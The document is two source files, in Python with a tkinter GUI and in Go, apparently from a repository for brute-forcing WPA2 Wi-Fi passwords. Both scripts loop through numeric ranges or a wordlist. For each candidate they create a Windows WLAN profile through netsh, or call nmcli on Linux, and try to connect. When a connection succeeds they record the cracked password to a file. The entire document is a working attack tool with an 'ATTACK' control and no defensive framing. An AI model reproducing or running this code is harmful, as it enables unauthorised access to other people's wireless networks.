File: python/wi-fi_bruteforce.py
import tkinter as tk
from tkinter import *
import subprocess
import time
import os
import re

def createNewConnection(name, SSID, password):
    config = """<?xml version=\"1.0\"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
    <name>"""+name+"""</name>
    <SSIDConfig>
        <SSID>
            <name>"""+SSID+"""</name>
        </SSID>
    </SSIDConfig>
    <connectionType>ESS</connectionType>
    <connectionMode>auto</connectionMode>
    <MSM>
        <security>
            <authEncryption>
                <authentication>WPA2PSK</authentication>
                <encryption>AES</encryption>
                <useOneX>false</useOneX>
            </authEncryption>
            <sharedKey>
                <keyType>passPhrase</keyType>
                <protected>false</protected>
                <keyMaterial>"""+password+"""</keyMaterial>
            </sharedKey>
        </security>
    </MSM>
</WLANProfile>"""
    command = "netsh wlan add profile filename=\""+name+".xml\""+" interface=Wi-Fi"
    with open(name+".xml", 'w') as file:
        file.write(config)
    os.system(command)
    # time.sleep(0.1)
    # os.remove('name.xml')

def connect(name, SSID):
    command = "netsh wlan connect name=\""+name+"\" ssid=\""+SSID+"\" interface=Wi-Fi"
    os.system(command)

def displayAvailableNetworks():
    results = subprocess.check_output(['netsh','wlan','show','network'])
    results = results.decode("ascii")
    results = results.replace("\r","")
    ls = results.split("\n")
    ls = ls[4:]
    ssids = []
    x = 0
    while x < len(ls):
        if x % 5 == 0:
            if len(ls[x]) >= 1 and not re.search(r'[/\\*?\"<>|]',ls[x]):
                ssids.append(re.search(r':\s+(.+)',ls[x])[1])
        x += 1
    return ssids

def getWiFi():
    wifi = subprocess.check_output(['netsh', 'WLAN', 'show', 'interfaces'])
    data = wifi.decode('utf-8')
    return re.search(r'State\s+: connected',data),(re.search(r'State\s+: connected',data) and re.search(r'SSID\s+: (.+)\r',data)[1] or '')

def parse_codes(C):
  for i in range((C*10000000)):
    code = str(i).zfill(C)
    print(code)

def bruteforce(name):

    find = False
    for w in displayAvailableNetworks():
        if w == name:
            find = True
    if find == False:
        print('ERROR NAME WI-FI')
        SSID_label['text'] = 'SSID(error name SSID)'
        return False

    def try_connect(password):
        with open(name+'.txt','a') as f:
            f.write('\n'+password)
        createNewConnection(name, name, password)
        connect(name, name)
        print(password)
        # time.sleep(0.2)`
        wifi,wifi_name = getWiFi()
        if wifi != None and wifi_name == name:
            with open('RESULT_'+name+'.txt','w') as f:
                f.write('password:\n'+password)
            return True
        return False

    if len(password_list.get()) == 0:
        for RANGE in range(8,13):
            for i in range((RANGE*10000000)):
                code = str(i).zfill(RANGE)
                try_connect(code)
        return False
    else:
        if re.search(r'^\d+\-\d+$',password_list.get()):
            m = re.search(r'^(\d+)\-(\d+)$',password_list.get())
            for code in range(int(m[1]),int(m[2])):
                try_connect(str(code).zfill(8))

        elif not os.path.exists(password_list.get()):
            return False
        else:
            with open(password_list.get(),'r') as f:
                for l in f.read().split('\n'):
                    try_connect(l)
            return False

def ATTACK():
    if len(SSID.get()) == 0 or re.search(r'^\s+$',SSID.get()):
        print('1')
    else:
        bruteforce(SSID.get())
def faq():
    os.system('explorer "https://github.com/v3sp4n/wifi-bruteforce/blob/main/python/readme.md"')


# bruteforce()


window = tk.Tk()
window.title('bruteforce WI-FI / by vespan')
window.minsize(350,0)


SSID_label = tk.Label(text="SSID")
SSID_label.pack()
SSID = tk.Entry()
SSID.pack()

password_list_label = tk.Label(text="password list/range \"min-max\"")
password_list_label.pack()
password_list = tk.Entry()
password_list.pack()


button = tk.Button(text="ATTACK", command=ATTACK)
button.pack()
button = tk.Button(text="(faq&github)", command=faq, bg = 'gray')
button.pack()
window.mainloop()

File: go/wifi_bruteforce.go
package main

import (
	"io/ioutil"
	"strconv"
	"runtime"
	"os/exec"
	"strings"
	"regexp"
	"time"
	"fmt"
	"os"
)

func find(text,searching string) (bool,[]string) {
	m := regexp.MustCompile(searching).FindStringSubmatch(text)
	return len(m) >= 1, m
}

func getWifi() (bool,string) {
	output,_ := exec.Command("netsh", "WLAN", "show", "interfaces").Output()
	if f,_ := find(string(output),`State\s+\:\s+(\S+)`); f {
		if f,auth := find(string(output),`Authentication\s+\:\s+(\S+)`); f && auth[1] != "Unknown" {
			if f,wifi := find(string(output),`SSID\s+\:\s+(\S+)`); f {
				return true,wifi[1]
			}
		}
	}
	return false,""	
}

func main() {
	var wifi string
	var menu string

	if _,err := os.Stat("temp"); err != nil {
		os.Mkdir("temp/", 0660)
	}

	for {
		fmt.Println("\n\n1.attack wifi\n2.set max range")
		fmt.Scan(&menu)

		switch menu {
		case "1":
			for {
				fmt.Println("\n\n\nselect wifi:")

				wifi_list := []string{}
				if runtime.GOOS == "linux" {
					output,_ := exec.Command("nmcli", "dev", "wifi", "list").Output()
					outputSplit := strings.Split(string(output),"\n")
					for i := 0; i < len(outputSplit); i++ {
						if f,m := find(outputSplit[i],`(\S+)\:(\S+)\:(\S+)\:(\S+)\:(\S+)\:(\S+)\s+(\S+)`); f {
							fmt.Printf("%d.%s \n",i-1,m[7])
							wifi_list = append(wifi_list,m[7])
						}
					} 
				} else if runtime.GOOS == "windows" {
					output,_ := exec.Command("netsh", "wlan", "show", "networks").Output()
					outputSplit := strings.Split(string(output),"\r")
					c := 0
					for i := 0; i < len(outputSplit); i++ {
						if f,m := find(outputSplit[i],`SSID \d+\s+\:\s+(\S+)`); f {
							fmt.Printf("%d.%s \n",c,m[1])
							wifi_list = append(wifi_list,m[1])
							c += 1
						}
					}
				} else {
					fmt.Println("unknown runtime.GOOS")
					for {

					}
				}
				fmt.Scan(&wifi)
				if f,m := find(wifi,`^(\d+)`); f {
					s,_  := strconv.Atoi(m[1])
					if s >= 0 && s <= (len(wifi_list)-1) {
						fmt.Println("\n\n*you select wifi ",wifi_list[s])
						wifi = wifi_list[s]
						break
					}
				}
			}

			fmt.Println(wifi)
			if _,err := os.Stat("temp/"+wifi+".txt"); err != nil { 
				ioutil.WriteFile("temp/"+wifi+".txt", []byte("1"), 0644)
			}

			fc,_ := ioutil.ReadFile("temp/"+wifi+".txt")
			count,_ := strconv.Atoi(string(fc))

			fleght,_ := ioutil.ReadFile("max_leght.txt")
			leght,_ := strconv.Atoi(string(fleght))

			for i := count; i <= leght; i++ {
				pass := fmt.Sprintf("%0"+strconv.Itoa(len(string(fleght)))+"d", i)
				fmt.Printf("[pass]%s\n",pass)
				ioutil.WriteFile("temp/"+wifi+".txt", []byte(strconv.Itoa(i-1)), 0644)

				if runtime.GOOS == "windows" {
					xml := `<?xml version="1.0"?>
		<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
		    <name>`+wifi+`</name>
		    <SSIDConfig>
		        <SSID>
		            <name>`+wifi+`</name>
		        </SSID>
		    </SSIDConfig>
		    <connectionType>ESS</connectionType>
		    <connectionMode>auto</connectionMode>
		    <MSM>
		        <security>
		            <authEncryption>
		                <authentication>WPA2PSK</authentication>
		                <encryption>AES</encryption>
		                <useOneX>false</useOneX>
		            </authEncryption>
		            <sharedKey>
		                <keyType>passPhrase</keyType>
		                <protected>false</protected>
		                <keyMaterial>`+pass+`</keyMaterial>
		            </sharedKey>
		        </security>
		    </MSM>
		</WLANProfile>`
					ioutil.WriteFile(wifi+".xml", []byte(xml), 0644)

					exec.Command("netsh", "wlan", "add", "profile", "filename=\""+wifi+".xml\"", "interface=Wi-Fi").Run()
					exec.Command("netsh", "wlan", "connect", "name=\""+wifi+"\"", "ssid=\""+wifi+"\"", "interface=Wi-Fi").Run()

					time.Sleep(250 * time.Millisecond)

					status,connectingWifi := getWifi()
					if status && connectingWifi == wifi {
						fmt.Println("succes connect!")
						ioutil.WriteFile(wifi+"_SUCCESFULL.txt", []byte(pass), 0644)
						return
					}
				} else if runtime.GOOS == "linux" {
					cmd := exec.Command("sudo","nmcli", "dev", "wifi", "connect", wifi, "password", pass)
					output, _ := cmd.CombinedOutput()
					fmt.Println(string(output))
				}

			}
		case "2":
			for {
				fmt.Println("enter max leght(800000000~)")
				var leght string
				fmt.Scan(&leght)
				if f,l := find(leght,`^(\d+)$`); f {
					ioutil.WriteFile("max_leght.txt", []byte(l[1]), 0644)
					break
				}
			}
		default:
			fmt.Println("emm..")
		}
	}

}

//	nmcli dev wifi list  
//	sudo nmcli dev wifi connect <network-ssid> password <network-password>
//	sudo nmcli dev wifi connect TP-Link_20B8 password 12345678


